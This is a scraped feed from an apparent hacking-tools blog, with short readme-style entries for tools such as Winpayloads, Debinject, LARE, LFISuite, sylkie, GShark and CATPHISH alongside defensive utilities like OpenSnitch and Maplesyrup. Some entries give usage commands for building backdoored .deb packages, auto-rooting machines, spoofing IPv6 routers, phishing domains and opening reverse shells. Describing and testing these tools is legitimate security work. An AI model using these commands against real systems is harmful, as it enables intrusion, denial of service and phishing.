Quantcast
Channel: Hacking Tools – DigitalMunition
Viewing all 236 articles
Browse latest View live

CATPHISH – For Phishing And Corporate Espionage

$
0
0
c
Project for phishing and corporate espionage.

Current Algorithms

  • SingularOrPluralise
  • prependOrAppend
  • doubleExtensions
  • mirrorization
  • homoglyphs
  • dashOmission
  • Punycode

CATPHISH v.0.0.5
Added more languages. Improved generator code.

CATPHISH v.0.0.4
Added Punycode algorithm for vietnamese and cyrillic characters map.

ruby catphish.rb -d microsoft.com -m Punycode -a

CATPHISH v.0.0.3
Analyzie target domain to generate smiliar-looking domains for phishing attacks.

▼Advertisements

HOW TO USE

The post CATPHISH – For Phishing And Corporate Espionage appeared first on DigitalMunition.


pyrasite – Inject Code Into Running Python Processes

$
0
0
p

pyrasite is a Python-based toolkit to inject code into running Python processes.

pyrasite works with Python 2.4 and newer. Injection works between versions as well, so you can run Pyrasite under Python 3 and inject into 2, and vice versa.

Usage

You can download pyrasite here:

pyrasite-2.0.zip

Or read more here.

The post pyrasite – Inject Code Into Running Python Processes appeared first on DigitalMunition.

OpenSnitch – GNU/Linux port of the Little Snitch application firewall

$
0
0
t
OpenSnitch is a GNU/Linux port of the Little Snitch application firewall.

Requirements
You’ll need a GNU/Linux distribution with iptables, NFQUEUE and ftrace kernel support.

Install

sudo apt-get install build-essential python3-dev python3-setuptools libnetfilter-queue-dev python3-pyqt5 python3-gi python3-dbus python3-pyinotify
cd opensnitch
sudo python3 setup.py install

Run

sudo -HE opensnitchd
opensnitch-qt

Known Issues / Future Improvements
Before opening an issue, keep in mind that the current implementation is just an experiment to see the doability of the project, future improvements of OpenSnitch will include:
Split the project into opensnitchd, opensnitch-ui and opensnitch-ruleman:

  • opensnitchd will be a (C++ ? TBD) daemon, running as root with the main logic. It’ll fix this.
  • opensnitch-ui python (?) UI running as normal user, getting the daemon messages. Will fix this.
  • opensnitch-ruleman python (?) UI for rule editing.


How Does It Work
OpenSnitch is an application level firewall, meaning then while running, it will detect and alert the user for every outgoing connection applications he’s running are creating. This can be extremely effective to detect and block unwanted connections on your system that might be caused by a security breach, causing data exfiltration to be much harder for an attacker. In order to do that, OpenSnitch relies on NFQUEUE, an iptables target/extension which allows an userland software to intercept IP packets and either ALLOW or DROP them, once started it’ll install the following iptables rules:

OUTPUT -t mangle -m conntrack --ctstate NEW -j NFQUEUE --queue-num 0 --queue-bypass

▼Advertisements

This will use conntrack iptables extension to pass all newly created connection packets to NFQUEUE number 0 (the one OpenSnitch is listening on), and then:

INPUT --protocol udp --sport 53 -j NFQUEUE --queue-num 0 --queue-bypass

This will also redirect DNS queries to OpenSnitch, allowing the software to perform and IP -> hostname resolution without performing active DNS queries itself.
Once a new connection is detected, the software relies on the ftrace kernel extension in order to track which PID (therefore which process) is creating the connection.
If ftrace is not available for your kernel, OpenSnitch will fallback using the /proc filesystem, even if this method will also work, it’s vulnerable to application path manipulation as described in this issue, therefore it’s highly suggested to run OpenSnitch on a ftrace enabled kernel.

The post OpenSnitch – GNU/Linux port of the Little Snitch application firewall appeared first on DigitalMunition.

Find Exploits in Local and Online Databases: Findsploit

$
0
0
k

Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes “copysploit” to copy any exploit-db exploit to the current directory and “compilesploit” to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c).

 

How To Install and Find Exploits

./install.sh

 

Usage

root@kali:/# findsploit heartbleed

   ___ _           _           _       _ _
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|

▼Advertisements

+ -- --=[findsploit v1.4 by 1N3 + -- --=[https://crowdshield.com + -- --=[SEARCHING: heartbleed + -- --=[NMAP SCRIPTS /usr/share/nmap/scripts/ssl-heartbleed.nse + -- --=[METASPLOIT EXPLOITS msf_search/auxiliary: scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak msf_search/auxiliary: server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure + -- --=[EXPLOITDB EXPLOITS Description Path --------------------------------------------------------------------------- ------------------------- Heartbleed OpenSSL - Information Leak Exploit (1) /multiple/remote/32791.c Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support /multiple/remote/32998.c + -- --=[Press any key to search online or Ctrl+C to exit... https://github.com/1N3/findsploit

 

The post Find Exploits in Local and Online Databases: Findsploit appeared first on DigitalMunition.

Security and Privacy Assurance Research: SPARTA Framework

$
0
0
s

Developed as a part of MIT Lincoln Laboratory’s test and evaluation role in the SPAR (Security and Privacy Assurance Research) program, SPARTA (SPAR Testing and Assessment) framework is a set of software applications used to evaluate the functionality and performance of relational database systems (e.g., MySQL/MariaDB) and messaging systems (e.g., ActiveMQ). These utilities were used to evaluate research prototypes for secure and private information retrieval systems as compared to state-of-the-art open source implementations.

SPARTA includes utilities for test dataset generation (e.g., synthetic SQL databases), test case generation (e.g., SQL queries, publisher/subscriber sets), test execution, system resource monitoring, and test report generation. These utilities can be used to replicate tests executed during SPAR’s test and evaluation, or to evaluate existing relational database and messaging systems. SPARTA can be configured to be a tightly integrated framework that facilitates an entire system evaluation, from the creation of test data to the generation of human-readable test reports.

▼Advertisements

SPARTA utilities are useful for general software test and evaluation as well, including data structure libraries for high-performance string I/O, generic synthetic dataset generation capabilities, utilities for remote task execution, and more.

 

Top-level Documentation

 

https://github.com/mit-ll/sparta

The post Security and Privacy Assurance Research: SPARTA Framework appeared first on DigitalMunition.

Embedded Devices CPU Security: Maplesyrup

$
0
0
e

Maplesyrup is a tool that can be used to help determine the security state of an ARM-based device by examining the system register interface of the CPU.

 

Who is this for?

Maplesyrup is for anyone who has low level access to a handset or single-board PC running an ARMv7A/v8A based processor and is interested in knowing the register level configuration of their CPU at OS runtime. These registers contain featureset and security information that may influence operation of the system kernel and running applications.

 

Why was this created?

Linux provides featureset and platform information to the user in the /proc and /sys filesystems, but the configurations governing how these features operate is sometimes hidden to the user. In some cases, the OS will make use of the information to conform to implementation specific features and not indicate this to the user. In other cases, these features may not be managed by the operating system at all, but nevertheless could potentially affect the operation of the system by configuring how a CPU controls access to security domains, executes specific instructions, and handles CPU exceptions.

 

How does it work?

Maplesyrup consists of a kernel driver and a user mode component. The kernel driver collects the information and returns it to the user mode component which parses the information and presents it to the user.

 

What can I do with the results?

The results will show the low level operating configuration of the system, and can be used to help determine the security state of a device. They may include security settings such as the status of Virtualization Extensions, Security Extensions and coprocessor access restrictions. A few specific examples are listed below:

  • The UWXN and WXN fields within the SCTLR register on ARMv7A based processors will affect how the Execute Never (XN) feature will operate.
  • The Domain Access Control Register (DACR) defines access permissions for each of the 16 memory domain regions.
  • The coprocessor Access Control Register (CPACR) can be used to determine whether a coprocessor is implemented and what it’s access controls are.
  • Trap information details the execution level certain exceptions will be taken to and which stack pointer will be used (for AARCH64).
  • Debug Architecture access permissions

 

What do the results represent?

The data stored in the system registers may or may not represent how the chip actually operates and the nature of the value is entirely defined by the vendor implementing the device. In addition, some registers will be read at boot time and the results stored to memory. In these cases, manually flipping the bit after the OS has booted will likely not have any effect. Another thing to note is that several registers report information that is relevant to a procedure and may have no further relevance once that procedure has completed.

▼Advertisements

Features/Limitations

  • Multi-core support
  • Memory-mapped system registers are currently not supported
  • Only EL0/EL1 are supported
  • Support for Cortex A7/A15/A53/A57
  • Support for memory-mapped devices

This application reads only a small portion of the available system registers on an ARM CPU. Please refer to the ARMv7A and ARMv8A Architecture Manuals and the appropriate Cortex TRM for official documentation.

WARNING: This application and kernel module are to be used only on test systems. Leaving the kernel module installed on a non-test system will compromise the system’s security.

 

Platforms Tested

  • Galaxy S5 Exynos Variant
  • ODROID-XU3
  • HOWCHIP 5250 Ver. C
  • Versatile Express-A9 (QEMU)
  • Android Goldfish 3.4 (QEMU)
  • Versatile JUNO Development Platform
  • Raspberry PI 2

 

Requirements

  • Ubuntu 14.04
  • sudo apt-get install libtool autoconf
  • Toolchain for target architecture (if cross compiling) to build usermode and kernel components
    • arm-linux-gnueabi for 32-bit
    • aarch64-linux-gnu for 64-bit
    • arm-linux-androideabi for Android
  • Kernel source tree (required for kernel module build)
  • Linux based device with root access and the ability to load unsigned kernel modules

 

Usage Instructions

Usage: maplesyrup --<register|group|bitfield|all> <NAME or ID> --arch=<ARCH> --impl=<IMPL or all> [--core=<CORE or -1>] [OTHER OPTIONS]

  --arch - armv7a or armv8a
  --impl - cortex-a7, cortex-a15, cortex-a53, cortex-a57, or all
  --core - core number, or -1 for all cores
  --calc - supply register value. Use with --register <regname>
  --help - show this menu
  --group - search by group
  --register - search by register
  --bitfield - search by bitfield
  --all - search all available bitfields
  --noparse - don't parse the results into bitfields
  --showfail - show all results regardless of success
  --el0 - force execution at pl0
  --el1 - force execution at pl1
  --devices - include memory-mapped devices (memory intensive)
  --show_groups - shows all valid functional groups
  --show_bitfields - shows all valid bitfields
  --show_registers - shows all valid register

Examples:
    (1) maplesyrup --register MIDR --arch=armv7a --impl=all
        to display the MIDR register
    (2) maplesyrup --all --arch=armv7a --impl=all
        to display the all registers
    (3) maplesyrup --register MIDR --arch=armv7a --impl=all --calc=0x410fc073
        supply a value

    Sample output
    > maplesyrup --register MIDR --arch=armv7a --impl=all --core=0

    ============================
    || Maplesyrup 1.0         ||
    ||    -linux              ||
    ||    -aarch32            ||
    ||                        ||
    || 000005/000040 entries  ||
    ============================
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/03:00/Revision]: 0x3 (Revision) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/15:04/Primary part number]: 0xc07 (Primary part number) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/19:16/Architecture]: 0xf (Architecture) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/23:20/Variant]: 0x0 (Variant) (0)
    [cpu0/cortex-a7/armv7a/1/ident/MIDR/31:24/Implementer]: 0x41 (Implementer) (0)
      |      |        |    |   |     |     |       |          |        |         |
      |      |        |    |   |     |     |       |          |        |         |
     Core #  |        |    |   |     |     |       |          |        |         |
         Part number  |    |   |     |     |       |          |        |         |
     The decode table used |   |     |     |       |          |        |         |
           The exception level |     |     |       |          |        |         |
                The functional group |     |       |          |        |         |
                         The register name |       |          |        |         |
                    The bitfield size and position |          |        |         |
                                             The field name   |        |         |
                                                 Actual result value   |         |
                                                            A brief description  |
                                                                            Result validity

 

https://github.com/iadgov/maplesyrup

The post Embedded Devices CPU Security: Maplesyrup appeared first on DigitalMunition.

sylkie: IPv6 Address Spoofing

$
0
0
i

A command line tool and library for testing networks for common address spoofing security vulnerabilities in IPv6 networks using the Neighbor Discovery Protocol.

Dependencies

  • libseccomp
  • json-c

Basic usage

The following describes the basic usage of sylkie. Run sylkie -h or sylkie <subcommand> -h for more details.

DoS (Router Advert)

The basic usage of the sylkie router advert command is listed below. This command will send a Router Advertisement message to the given ip or the all nodes multicast addres causing the targeted nodes to remove <router-ip>/<prefix>from their list of default routes.
sylkie ra -interface <interface> \
    –target-mac <mac of router> \
    –router-ip <ip of router> \
    –prefix <router prefix> \
    –timeout <time between adverts> \
    –repeat <number of times to send the request>
}
 

How it works:

The router advert (ra) command attempts to DoS a network by sending “forged” Router Advertisement messages to either a targeted address (if one is provided) or the link local scope all-nodes address ff02::1. The “forged” Router Advertisement contains Prefix Information with the lifetimes set to 0. The message also contains the Source Link-Layer Address. This should cause the targeted address or all link local nodes to remove the targetted router from the list of default routes.

▼Advertisements

Address spoofing (Neighbor Advert)

sylkie na -i <interface> \
    –dst-mac <dest hw addr> \
    –src-ip <source ip> \
    –dst-ip <dest ip address> \
    –target-ip <target ip address> \
    –target-mac <target mac address> \
    –timeout <time betweeen adverts> \
    –repeat <number of times to send the request>
Download Now and start spoofing IPv6 addresses.

The post sylkie: IPv6 Address Spoofing appeared first on DigitalMunition.

Winpayloads – Undetectable Windows Payload Generation

$
0
0
w

Winpayloads is a tool to provide undetectable Windows payload generation with some extras running on Python 2.7.

It provides persistence, privilege escalation, shellcode invocation and much more.

▼Advertisements

Features

  • UACBypass – PowerShellEmpire
  • PowerUp – PowerShellEmpire
  • Invoke-Shellcode
  • Invoke-Mimikatz
  • Invoke-EventVwrBypass
  • Persistence – Adds payload persistence on reboot
  • Psexec Spray – Spray hashes until successful connection and psexec payload on target
  • Upload to local webserver – Easy deployment
  • Powershell stager – allows invoking payloads in memory & more

Installation

  1. git clone https://github.com/nccgroup/winpayloads.git
  2. cd winpayloads
  3. ./setup.sh will setup everything needed for Winpayloads
  4. Start Winpayloads ./Winpayloads.py
  5. Type ‘help’ or ‘?’ to get a detailed help page

You can download Winpayloads here:

Winpayloads-master.zip

Or read more here.

The post Winpayloads – Undetectable Windows Payload Generation appeared first on DigitalMunition.


LARE – [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits

$
0
0
149891085568148
[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine do not have internet connectivity.
The script is useful in a scenario where your victim machine do not have an internet connection (eg.) while you pivot into internal networks or playing CTFs which uses VPN to connect to there closed labs (eg.) hackthebox.gr or even in OSCP labs. The script uses Local root exploits for Linux Kernel 2.6-4.8
This script is inspired by Nilotpal Biswas’s Auto Root Exploit Tool

Usage:

1- Attacking Victimin Closed Network
You have to first set the exploit arsenal on the attacking machine and start the apache2 instatnce using the following command.bash LARE.sh -a or ./LARE.sh -a

Once done with it, You have to copy the script to the victim machine via any means (wget, ftp, curl etc). and run the Exploiter locally with the following command: bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]

▼Advertisements

2- Attacking Victim with Internet Acess
In this scenario the script is to be ran on the victims machine and it will get the exploits from the exploit-db’s github repository and use it for exploitation directly. This is the original fuctionality of Auto Root Exploit Tool with some fine tunning done. Run the Exploiter with the following command: bash LARE.sh -l or ./LARE.sh -l

Note
The script runs multiple kernal exploits on the machine which can result in unstability of the system, it is highly recommended to uses it as the last resort and in a non-production environment.

The post LARE – [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits appeared first on DigitalMunition.

Gitrob – Reconnaissance Tool for GitHub Organizations

$
0
0
g
Gitrob is a command line tool which can help organizations and security professionals find sensitive information lingering in publicly available files on GitHub. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files that typically contain sensitive or dangerous information.
Looking for sensitive information in GitHub repositories is not a new thing, it has been known for a while that things such as private keys and credentials can be found with GitHub’s search functionality, however, Gitrob makes it easier to focus the effort on a specific organization.
Installation
1. Ruby
Gitrob is written in Ruby and requires at least version 1.9.3 or above. To check which version of Ruby you have installed, simply run ruby --version in a terminal.
Should you have an older version installed, it is very easy to upgrade and manage different versions with the Ruby Version Manager (RVM). Please see the RVM website for installation instructions.
2. RubyGems
Gitrob is packaged as a Ruby gem to make it easy to install and update. To install Ruby gems you’ll need the RubyGems tool installed. To check if you have it already, type gem in a Terminal. If you got it already, it is recommended to do a quick gem update --system to make sure you have the latest and greatest version. In case you don’t have it installed, download it fromhere and follow the simple installation instructions.
3. PostgreSQL
Gitrob uses a PostgreSQL database to store all the collected data. If you are setting up Gitrob in the Kali linux distribution you already have it installed, you just need to make sure it’s running by executing service postgresql start and install a dependency with apt-get install libpq-dev in a terminal. Here’s an excellent guide on how to install PostgreSQL on a Debian based Linux system. If you are setting up Gitrob on a Mac, the easiest way to install PostgreSQL is with Homebrew. Here’s aguide on how to install PostgreSQL with Homebrew.

3.1 PostgreSQL user and database
You need to set up a user and a database in PostgreSQL for Gitrob. Execute the following commands in a terminal:

sudo su postgres # Not necessary on Mac OS X
createuser -s gitrob --pwprompt
createdb -O gitrob gitrob

You now have a new PostgreSQL user with the name gitrob and with the password you typed into the prompt. You also created a database with the name gitrob which is owned by the gitrob user.

4. GitHub access tokens
Gitrob works by querying the GitHub API for interesting information, so you need at least one access token to get up and running. The easiest way is to create a Personal Access Token. Press the Generate new token button and give the token a description. If you intend on using Gitrob against organizations you’re not a member of you don’t need to give the token any scopes, as we will only be accessing public data. If you intend to run Gitrob against your own organization, you’ll need to check the read:orgscope to get full coverage.
If you plan on using Gitrob extensively or against a very large organization, it might be necessary to have multiple access tokens to avoid running into rate limiting. These access tokens will have to be from different user accounts.

5. Gitrob
With all the previous steps completed, you can now finally install Gitrob itself with the following command in a terminal:

gem install gitrob

This will install the Gitrob Ruby gem along with all its dependencies. Congratulations!

6. Configuring Gitrob
Gitrob needs to know how to talk to the PostgreSQL database as well as what access token to use to access the GitHub API. Gitrob comes with a convenient configuration wizard which can be invoked with the following command in a terminal:

gitrob configure

The configuration wizard will ask you for the information needed to set up Gitrob. All the information is saved to ~/.gitrobrcand yes, Gitrob will be looking for this file too, so watch out!

Usage

Analyzing organizations and users
Analyzing organizations and users is the main feature of Gitrob. The analyze command accepts an arbitrary amount of organization and user logins, which will be bundled into an assessment:

gitrob analyze acme,johndoe,janedoe

Mixing organizations and users is convenient if you know that a certain user is part of an organization but they do not have their membership public.
When the assessment is finished, the analyze command will automatically start up the web server to present the results. This can be avoided by adding the --no-server option to the command.
See gitrob help analyze for more options.

Running Gitrob against custom GitHub Enterprise installations
Gitrob can analyze organizations and users on custom GitHub Enterprise installations instead of the official GitHub site. Theanalyze command takes several options to control this:

gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2

See gitrob help analyze for more options.

Starting the Gitrob web server
The Gitrob web server can be started with the server command:

gitrob server

By default, the server will listen on localhost:9393. This can, of course, all be controlled:

gitrob server --bind-address=0.0.0.0 --port=8000

See for gitrob help servermore options.

Adding custom signatures
If you want to look for files that are specific to your organisation or projects, it is easy to add custom signatures.
When Gitrob starts it looks for a file at ~/.gitrobsignatures which it expects to be a JSON document with signatures that follow the same structure as the main signatures.json file. Here is an example:

[
  {
    "part": "filename",
    "type": "match",
    "pattern": "otr.private_key",
    "caption": "Pidgin OTR private key",
    "description": null
  }
]

This signature instructs Gitrob to flag files where the filename exactly matches otr.private_key. The caption and description are used in the web interface when displaying the findings.

▼Advertisements

Signature keys

  • part: Can be one of:
    • path: The complete file path
    • filename: Only the filename
    • extension: Only the file extension
  • type: Can be one of:
    • match: Simple match of part and pattern
    • regex: Regular expression matching of part and pattern
  • pattern: The value or regular expression to match with
  • caption: A short description of the finding
  • description: More detailed description if needed (set to null if not).

Have a look at the main signatures.json file for more examples of signatures.

The post Gitrob – Reconnaissance Tool for GitHub Organizations appeared first on DigitalMunition.

AQUATONE – A Tool for Domain Flyovers

$
0
0
w
AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.
Installation
Dependencies
AQUATONE depends on Node.js and NPM package manager for its web page screenshotting capabilities. Follow this guide for Installation instructions.
You will also need a newer version of Ruby installed. If you plan to use AQUATONE in Kali Linux, you are already set up with this. If not, it is recommended to install Ruby with RVM.
Finally, the tool itself can be installed with the following command in a terminal:
$ gem install aquatone
IMPORTANT: AQUATONE’s screenshotting capabilities depend on being run on a system with a graphical desktop environment. It is strongly recommended to install and run AQUATONE in a Kali linux virtual machine. I will not provide support or bug fixing for other systems than Kali Linux.

Usage

Discovery
The first stage of an AQUATONE assessment is the discovery stage where subdomains are discovered on the target domain using open sources, services and the more common dictionary brute force approach:

$ aquatone-discover --domain example.com

aquatone-discover will find the target’s nameservers and shuffle DNS lookups between them. Should a lookup fail on the target domain’s nameservers, aquatone-discover will fall back to using Google’s public DNS servers to maximize discovery. The fallback DNS servers can be changed with the --fallback-nameservers option:

$ aquatone-discover --domain example.com --fallback-nameservers 87.98.175.85,5.9.49.12

Tuning
aquatone-discover will use 5 threads as default for concurrently performing DNS lookups. This provides reasonable performance but can be tuned to be more or less aggressive with the --threads option:

$ aquatone-discover --domain example.com --threads 25

Hammering a DNS server with failing lookups can potentially be picked up by intrusion detection systems, so if that is a concern for you, you can make aquatone-discover a bit more stealthy with the --sleep and --jitter options. --sleep accepts a number of seconds to sleep between each DNS lookup while --jitter accepts a percentage of the --sleep value to randomly add or subtract to or from the sleep interval in order to break the sleep pattern and make it less predictable.

$ aquatone-discover --domain example.com --sleep 5 --jitter 30

Please note that setting the --sleep option will force the thread count to one. The --jitter option will only be considered if the --sleep option has also been set.

API keys
Some of the passive collectors will require API keys or similar credentials in order to work. Setting these values can be done with the --set-key option:

$ aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ

All keys will be saved in ~/aquatone/.keys.yml.

Results
When aquatone-discover is finished, it will create a hosts.txt file in the ~/aquatone/<domain> folder, so for a scan of example.com it would be located at ~/aquatone/example.com/hosts.txt. The format will be a comma-separated list of hostnames and their IP, for example:

example.com,93.184.216.34
www.example.com,93.184.216.34
secret.example.com,93.184.216.36
cdn.example.com,192.0.2.42
...

In addition to the hosts.txt file, it will also generate a hosts.json which includes the same information but in JSON format. This format might be preferable if you want to use the information in custom scripts and tools. hosts.json will also be used by the aquatone-scan and aquatone-gather tools.
See aquatone-discover --help for more options.

Scanning
The scanning stage is where AQUATONE will enumerate the discovered hosts for open TCP ports that are commonly used for web services:

$ aquatone-scan --domain example.com

The --domain option will look for hosts.json in the domain’s AQUATONE assessment directory, so in the example above it would look for ~/aquatone/example.com/hosts.json. This file should be present if aquatone-discover --domain example.com has been run previously.

Ports
By default, aquatone-scan will scan the following TCP ports: 80, 443, 8000, 8080 and 8443. These are very common ports for web services and will provide a reasonable coverage. Should you want to specifiy your own list of ports, you can use the --portsoption:

$ aquatone-scan --domain example.com --ports 80,443,3000,8080

Instead of a comma-separated list of ports, you can also specify one of the built-in list aliases:

  • small: 80, 443
  • medium: 80, 443, 8000, 8080, 8443 (same as default)
  • large: 80, 81, 443, 591, 2082, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 55672
  • huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5280, 5281, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 8080, 8081, 8083, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8337, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 11371, 12443, 16080, 18091, 18092, 20720, 55672

Example:

$ aquatone-scan --domain example.com --ports large

Tuning
Like aquatone-discover, you can make the scanning more or less aggressive with the --threads option which accepts a number of threads for concurrent port scans. The default number of threads is 5.

$ aquatone-scan --domain example.com --threads 25

As aquatone-scan is performing port scanning, it can obviously be picked up by intrusion detection systems. While it will attempt to lessen the risk of detection by randomising hosts and ports, you can tune the stealthiness more with the --sleep and --jitter options which work just like the similarly named options for aquatone-discover. Keep in mind that setting the --sleepoption will force the number of threads to one.

Results
When aquatone-scan is finished, it will create a urls.txt file in the ~/aquatone/<domain> directory, so for a scan of example.com it would be located at ~/aquatone/example.com/urls.txt. The format will be a list of URLs, for example:

http://example.com/
https://example.com/
http://www.example.com/
https://www.example.com/
http://secret.example.com:8001/
https://secret.example.com:8443/
http://cdn.example.com/
https://cdn.example.com/
...

This file can be loaded into other tools such as EyeWitness.
aquatone-scan will also generate a open_ports.txt file, which is a comma-separated list of hosts and their open ports, for example:

93.184.216.34,80,443
93.184.216.34,80
93.184.216.36,80,443,8443
192.0.2.42,80,8080
...

See aquatone-scan --help for more options.

Gathering
The final stage is the gathering part where the results of the discovery and scanning stages are used to query the discovered web services in order to retrieve and save HTTP response headers and HTML bodies, as well as taking screenshots of how the web pages look like in a web browser to make analysis easier. The screenshotting is done with the Nightmare.js Node.js library. This library will be installed automatically if it’s not present in the system.

$ aquatone-gather --domain example.com

aquatone-gather will look for hosts.json and open_ports.txt in the given domain’s AQUATONE assessment directory and request and screenshot every IP address for each domain name for maximum coverage.

▼Advertisements

Tuning
Like aquatone-discover and aquatone-scan, you can make the gathering more or less aggressive with the --threads option which accepts a number of threads for concurrent requests. The default number of threads is 5.

$ aquatone-gather --domain example.com --threads 25

As aquatone-gather is interacting with web services, it can be picked up by intrusion detection systems. While it will attempt to lessen the risk of detection by randomising hosts and ports, you can tune the stealthiness more with the --sleep and --jitter options which work just like the similarly named options for aquatone-discover. Keep in mind that setting the --sleepoption will force the number of threads to one.

Results
When aquatone-gather is finished, it will have created several directories in the domain’s AQUATONE assessment directory:

  • headers/: Contains text files with HTTP response headers from each web page
  • html/: Contains text files with HTML response bodies from each web page
  • screenshots/: Contains PNG images of how each web page looks like in a browser
  • report/ Contains report files in HTML displaying the gathered information for easy analysis

 

The post AQUATONE – A Tool for Domain Flyovers appeared first on DigitalMunition.

Totally Automatic LFI Exploiter & Scanner: LFISuite

$
0
0
l

LFI Suite is a totally automatic tool able to scan and exploit Local File Inclusion vulnerabilities using many different methods of attack.

 

Features

  • Works with Windows, Linux and OS X
  • Automatic Configuration
  • Automatic Update
  • Provides 8 different Local File Inclusion attack modalities:
    • /proc/self/environ
    • php://filter
    • php://input
    • /proc/self/fd
    • access log
    • phpinfo
    • data://
    • expect://
  • Provides a ninth modality, called Auto-Hack, which scans and exploits the target automatically by trying all the attacks one after the other without you having to do anything (except for providing, at the beginning, a list of paths to scan, which if you don’t have you can find in this project directory in two versions, small and huge).
  • Tor proxy support
  • Reverse Shell for Windows, Linux and OS X

 

 

▼Advertisements

How to use it?

Usage is extremely simple and LFI Suite has an easy-to-use user interface; just run it and let it lead you.

Reverse Shell

When you got a LFI shell by using one of the available attacks, you can easily obtain a reverse shell by entering the command “reverseshell” (obviously you must put your system listening for the reverse connection, for instance using “nc -lvp port”).

 

Dependencies

  • Python 2.7.x
  • Python extra modules: termcolor, requests
  • socks.py

https://github.com/D35m0nd142/LFISuite

The post Totally Automatic LFI Exploiter & Scanner: LFISuite appeared first on DigitalMunition.

PPEE (Puppy) – Professional PE file Explorer for reversers and malware researchers

$
0
0
p
There are lots of tools out there for statically analyzing malicious binaries, but they are ordinary tools for ordinary files.
Puppy is a lightweight yet strong tool for static investigation of suspicious files. A companion plugin is also provided to query the file in the well-known malware repositories and take one-click technical information about the file such as its size, entropy, attributes, hashes, version info and so on.
Features
Puppy is robust against malformed and crafted PE files which makes it handy for reversersmalware researchers and those who want to inspect PE files in more details. All directories in a PE file including Export, Import, Resource, Exception, Certificate(Relies on Windows API), Base Relocation, Debug, TLS, Load Config, Bound Import, IAT, Delay Import, and CLR are supported.
  • Both PE32 and PE64 support
  • Examine YARA rules against opened file
  • Virustotal and OPSWAT’s Metadefender query report
  • Statically analyze windows native and .Net executables
  • Robust Parsing of exe, dll, sys, scr, drv, cpl, ocx and more
  • Edit almost every data structure
  • Easily dump sections, resources and .Net assembly directories
  • Entropy and MD5 calculation of the sections and resource items
  • View strings including URL, Registry, Suspicious, … embedded in files
  • Detect common resource types
  • Extract artifacts remained in PE file
  • Anomaly detection
  • Right-click for Copy, Search in web, Whois and dump
  • Built-in hex editor
  • Explorer context menu integration
  • Descriptive information for data members
  • Refresh, Save and Save as menu commands
  • Drag and drop support
  • List view columns can sort data in an appropriate way
  • Open file from command line
  • Checksum validation
  • Plugin enabled
Screenshots

The post PPEE (Puppy) – Professional PE file Explorer for reversers and malware researchers appeared first on DigitalMunition.

Debinject – Inject malicious code into *.debs

$
0
0
d

Inject malicious code into *.debs

CLONE

git clone https://github.com/UndeadSec/Debinject.git

RUNNING

cd Debinject
python debinject.py

If you have another version of Python:

python2.7 debinject.py

RUN ON TARGET SIDE
chmod 755 default.deb
dpkg -i backdoored.deb

PREREQUISITES

  • dpkg
  • dpkg-deb
  • metasploit

▼Advertisements

TESTED ON

  • Kali Linux – SANA
  • Kali Linux – ROLLING

 

The post Debinject – Inject malicious code into *.debs appeared first on DigitalMunition.

GShark Framework – Check all your backdoors with only one telegram account

$
0
0
g

This framework can perform web post exploitation, with this you can interact with multiple web backdoor and execute custom module, script.
Check all your backdoors with only one telegram messenger account!

  • Connect web backdoor to master server and control it with Telegram
  • Download visual backdoor on selected target
  • Execute custom module or PHP code in selected target
  • Start a multiples integrated commands in GShark
  • Generate offuscated GShark Executor backdoor
  • Configure proxy on master server for communicating to all backdoors (Proxy**)
  • Generate new backdoor source after interaction (AutoGenerate**)
  • More …

▼Advertisements

** Configuration with /config

Networking

 

The post GShark Framework – Check all your backdoors with only one telegram account appeared first on DigitalMunition.


Build Legacy-Free OS Images: mkosi

$
0
0
l

A fancy wrapper around dnf --installrootdebootstrappacstrap and zypper that may generate disk images with a number of bells and whistles.

mkosi is definitely a tool with a focus on developer’s needs for building OS images, for testing and debugging, but also for generating production images with cryptographic protection. A typical use-case would be to add a mkosi.default file to an existing project (for example, one written in C or Python), and thus making it easy to generate an OS image for it. mkosi will put together the image with development headers and tools, compile your code in it, run your test suite, then throw away the image again, and build a new one, this time without development headers and tools, and install your build artifacts in it. This final image is then “production-ready”, and only contains your built program and the minimal set of packages you configured otherwise. Such an image could then be deployed withcasync (or any other tool of course) to be delivered to your set of servers, or IoT devices or whatever you are building.

